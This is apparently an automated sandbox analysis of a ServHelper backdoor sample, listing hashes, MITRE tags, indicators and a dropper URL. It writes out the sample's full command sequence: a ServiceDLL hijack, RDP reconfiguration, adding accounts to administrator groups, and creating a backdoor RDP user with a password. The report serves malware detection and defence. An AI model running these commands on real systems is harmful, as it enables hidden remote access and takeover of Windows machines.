servhelper | 5af77a762d660414bc2691e7403f34b3356c156292e0a65162897c58b14c1e68

Analysis

max time kernel
91s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
19-04-2022 13:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5af77a762d660414bc2691e7403f34b3356c156292e0a65162897c58b14c1e68.exe
Size

3.4MB
MD5

96e48f0f832b8d9ab6e34a25edf9b35f
SHA1

226113af79947ef48088f2db35c98df4261ea15d
SHA256

5af77a762d660414bc2691e7403f34b3356c156292e0a65162897c58b14c1e68
SHA512

7c6f24c1c6f59e7e6331351c3526aceaf57c74d005e56e72294f3ddef154baddec9e6f060a92bc6ae0eb8876e9024d9d07e79d31cdc49800d790c5024a7b67aa

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 10 IoCs

Processes:

powershell.exe

flow	pid	process
25	4588	powershell.exe
27	4588	powershell.exe
28	4588	powershell.exe
29	4588	powershell.exe
30	4588	powershell.exe
32	4588	powershell.exe
34	4588	powershell.exe
36	4588	powershell.exe
38	4588	powershell.exe
40	4588	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exe

pid process

2556 icacls.exe
3436 icacls.exe
4128 icacls.exe
2304 icacls.exe
3380 icacls.exe
3280 icacls.exe
1132 icacls.exe
1624 takeown.exe
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
2556	icacls.exe
3436	icacls.exe
4128	icacls.exe
2304	icacls.exe
3380	icacls.exe
3280	icacls.exe
1132	icacls.exe
1624	takeown.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Branding\mediasrv.png	upx
C:\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

5088
5088
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

3280 icacls.exe
1132 icacls.exe
1624 takeown.exe
2556 icacls.exe
3436 icacls.exe
4128 icacls.exe
2304 icacls.exe
3380 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

pid	process
5088
5088

pid	process
3280	icacls.exe
1132	icacls.exe
1624	takeown.exe
2556	icacls.exe
3436	icacls.exe
4128	icacls.exe
2304	icacls.exe
3380	icacls.exe

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe

Drops file in Windows directory 18 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_kmucbr0b.ndg.ps1	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGICE0E.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGICEFB.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_gdzzbjup.frc.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGICEBC.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGICF2B.tmp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGICE7C.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4368 4136 WerFault.exe 5af77a762d660414bc2691e7403f34b3356c156292e0a65162897c58b14c1e68.exe

pid	pid_target	process	target process
4368	4136	WerFault.exe	5af77a762d660414bc2691e7403f34b3356c156292e0a65162897c58b14c1e68.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1284 reg.exe
Runs net.exe

pid	process
1284	reg.exe

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	27	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	28	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1
HTTP User-Agent header	29	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	30	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1
HTTP User-Agent header	32	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exe

pid process

4712 powershell.exe
4712 powershell.exe
4712 powershell.exe
4712 powershell.exe
4712 powershell.exe
4588 powershell.exe
4588 powershell.exe
Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

648
648

pid	process
4712	powershell.exe
4712	powershell.exe
4712	powershell.exe
4712	powershell.exe
4712	powershell.exe
4588	powershell.exe
4588	powershell.exe

pid	process
648
648

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exeicacls.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4712	powershell.exe
Token: SeRestorePrivilege	3436	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2328	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2328	WMIC.exe
Token: SeAuditPrivilege	2328	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2328	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2328	WMIC.exe
Token: SeAuditPrivilege	2328	WMIC.exe
Token: SeDebugPrivilege	4588	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5af77a762d660414bc2691e7403f34b3356c156292e0a65162897c58b14c1e68.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exe

description	pid	process	target process
PID 4136 wrote to memory of 4712	4136	5af77a762d660414bc2691e7403f34b3356c156292e0a65162897c58b14c1e68.exe	powershell.exe
PID 4136 wrote to memory of 4712	4136	5af77a762d660414bc2691e7403f34b3356c156292e0a65162897c58b14c1e68.exe	powershell.exe
PID 4712 wrote to memory of 4744	4712	powershell.exe	csc.exe
PID 4712 wrote to memory of 4744	4712	powershell.exe	csc.exe
PID 4744 wrote to memory of 4628	4744	csc.exe	cvtres.exe
PID 4744 wrote to memory of 4628	4744	csc.exe	cvtres.exe
PID 4712 wrote to memory of 1624	4712	powershell.exe	takeown.exe
PID 4712 wrote to memory of 1624	4712	powershell.exe	takeown.exe
PID 4712 wrote to memory of 2556	4712	powershell.exe	icacls.exe
PID 4712 wrote to memory of 2556	4712	powershell.exe	icacls.exe
PID 4712 wrote to memory of 3436	4712	powershell.exe	icacls.exe
PID 4712 wrote to memory of 3436	4712	powershell.exe	icacls.exe
PID 4712 wrote to memory of 4128	4712	powershell.exe	icacls.exe
PID 4712 wrote to memory of 4128	4712	powershell.exe	icacls.exe
PID 4712 wrote to memory of 2304	4712	powershell.exe	icacls.exe
PID 4712 wrote to memory of 2304	4712	powershell.exe	icacls.exe
PID 4712 wrote to memory of 3380	4712	powershell.exe	icacls.exe
PID 4712 wrote to memory of 3380	4712	powershell.exe	icacls.exe
PID 4712 wrote to memory of 3280	4712	powershell.exe	icacls.exe
PID 4712 wrote to memory of 3280	4712	powershell.exe	icacls.exe
PID 4712 wrote to memory of 1132	4712	powershell.exe	icacls.exe
PID 4712 wrote to memory of 1132	4712	powershell.exe	icacls.exe
PID 4712 wrote to memory of 2300	4712	powershell.exe	reg.exe
PID 4712 wrote to memory of 2300	4712	powershell.exe	reg.exe
PID 4712 wrote to memory of 1284	4712	powershell.exe	reg.exe
PID 4712 wrote to memory of 1284	4712	powershell.exe	reg.exe
PID 4712 wrote to memory of 920	4712	powershell.exe	reg.exe
PID 4712 wrote to memory of 920	4712	powershell.exe	reg.exe
PID 4712 wrote to memory of 2504	4712	powershell.exe	net.exe
PID 4712 wrote to memory of 2504	4712	powershell.exe	net.exe
PID 2504 wrote to memory of 1180	2504	net.exe	net1.exe
PID 2504 wrote to memory of 1180	2504	net.exe	net1.exe
PID 4712 wrote to memory of 2992	4712	powershell.exe	cmd.exe
PID 4712 wrote to memory of 2992	4712	powershell.exe	cmd.exe
PID 2992 wrote to memory of 760	2992	cmd.exe	cmd.exe
PID 2992 wrote to memory of 760	2992	cmd.exe	cmd.exe
PID 760 wrote to memory of 2680	760	cmd.exe	net.exe
PID 760 wrote to memory of 2680	760	cmd.exe	net.exe
PID 2680 wrote to memory of 2192	2680	net.exe	net1.exe
PID 2680 wrote to memory of 2192	2680	net.exe	net1.exe
PID 4712 wrote to memory of 4828	4712	powershell.exe	cmd.exe
PID 4712 wrote to memory of 4828	4712	powershell.exe	cmd.exe
PID 4828 wrote to memory of 3192	4828	cmd.exe	cmd.exe
PID 4828 wrote to memory of 3192	4828	cmd.exe	cmd.exe
PID 3192 wrote to memory of 3596	3192	cmd.exe	net.exe
PID 3192 wrote to memory of 3596	3192	cmd.exe	net.exe
PID 3596 wrote to memory of 3744	3596	net.exe	net1.exe
PID 3596 wrote to memory of 3744	3596	net.exe	net1.exe
PID 4376 wrote to memory of 3704	4376	cmd.exe	net.exe
PID 4376 wrote to memory of 3704	4376	cmd.exe	net.exe
PID 3704 wrote to memory of 5004	3704	net.exe	net1.exe
PID 3704 wrote to memory of 5004	3704	net.exe	net1.exe
PID 4884 wrote to memory of 3876	4884	cmd.exe	net.exe
PID 4884 wrote to memory of 3876	4884	cmd.exe	net.exe
PID 3876 wrote to memory of 3756	3876	net.exe	net1.exe
PID 3876 wrote to memory of 3756	3876	net.exe	net1.exe
PID 4456 wrote to memory of 4980	4456	cmd.exe	net.exe
PID 4456 wrote to memory of 4980	4456	cmd.exe	net.exe
PID 4980 wrote to memory of 4052	4980	net.exe	net1.exe
PID 4980 wrote to memory of 4052	4980	net.exe	net1.exe
PID 1808 wrote to memory of 4668	1808	cmd.exe	net.exe
PID 1808 wrote to memory of 4668	1808	cmd.exe	net.exe
PID 4668 wrote to memory of 1620	4668	net.exe	net1.exe
PID 4668 wrote to memory of 1620	4668	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\5af77a762d660414bc2691e7403f34b3356c156292e0a65162897c58b14c1e68.exe
"C:\Users\Admin\AppData\Local\Temp\5af77a762d660414bc2691e7403f34b3356c156292e0a65162897c58b14c1e68.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4136
- \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
  -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4712
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mr1m5zub\mr1m5zub.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4744
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEA6.tmp" "c:\Users\Admin\AppData\Local\Temp\mr1m5zub\CSCA214D68A58DB456FAC22B9DB53D564.TMP"
      4⤵
      PID:4628
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1624
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2556
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3436
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4128
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2304
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3380
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3280
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1132
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2300
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:1284
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:920
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2504
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:1180
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2992
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:760
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2680
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:2192
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4828
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3192
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3596
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:3744
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:4732
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:4092
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 480
  2⤵
  - Program crash
  PID:4368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4136 -ip 4136
1⤵
PID:3152

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:4376
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    PID:5004

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Knt1cdeB /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4884
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Knt1cdeB /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3876
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Knt1cdeB /add
    3⤵
    PID:3756

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:4456
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    PID:4052

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" FSHLRPTB$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1808
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" FSHLRPTB$ /ADD
  2⤵
